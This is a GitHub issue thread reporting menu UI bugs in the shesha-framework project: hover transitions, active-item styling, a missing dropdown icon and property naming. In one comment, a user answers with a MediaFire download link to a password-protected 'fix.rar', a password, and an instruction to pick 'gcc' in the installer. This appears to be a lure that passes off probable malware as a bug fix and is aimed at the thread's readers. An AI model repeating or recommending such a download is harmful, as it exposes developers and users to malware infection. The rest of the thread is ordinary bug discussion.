### ISSUE TITLE
Hover transition, active group color, dropdown icon, and property renaming Issues on the horizontal menu

### ISSUE THREAD

**Issue by Tshepiso-R** [shesha-io/shesha-framework#2081]
**Description**:  
Several issues have been identified with the menu group items and their corresponding hover and active states:

1. **Inconsistent Hover Transition**:  
   The hover effect on group items transitions smoothly. However, the color change is slow and noticeable when hovering over an individual menu.  
   - **Steps to Reproduce**:
     1. Hover over individual menu items and observe the transition effect.
     2. Hover over a menu group and compare the transition effect.
     4. Check for any visual distinction between individual and group items in the menu.
   - **Expected Behavior**: Hover color transitions should be consistent across individual items and entire menu groups.

2. **Active/Selected Style Not Working**:  
   The active item color, background, and Style On Selected are no longer working on both individual and group menus. Instead, they are applied to the sub-menu when you hover.  
   - **Steps to Reproduce**:
     1. Configure the Active Item color and Active Background Color, or return the background color or any CSS property using Style on the selected.
     2. Save and render.
     3. Click on any menu item.
     4. Observe that the configured colors are not applied.
   - **Expected Behavior**: The configured active item color and background should be correctly applied to the active group and individual menu.

3. **Missing Dropdown Icon for Group Menu Items**:  
   There is currently no way to visually differentiate between individual items and group items on the menu.  
   - **Expected Behavior**: A dropdown icon should be added to group menu items for a better user experience.

4. **Property Renaming**:  
   The property "Style On Selected" should align with the properties "Active Item Color" and "Active Item Background." Either the two properties should be renamed "Selected Item Color" and "Selected Item Background," or the property "Style On Selected" should be renamed to "Style On Active."  
   - **Expected Change**: The properties should be renamed accordingly.

**URL:** [Link to public portal](https://function-publicportal-test.shesha.dev/shesha/forms-designer?id=4776dbdb-a717-4c57-9e8d-4b79ca4f17c2)

**Comment by Bongton** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by Tshepiso-R** [comment]
The selected style for the active group wasn't implemented, as @Lukeybooi stated it’s not achievable.
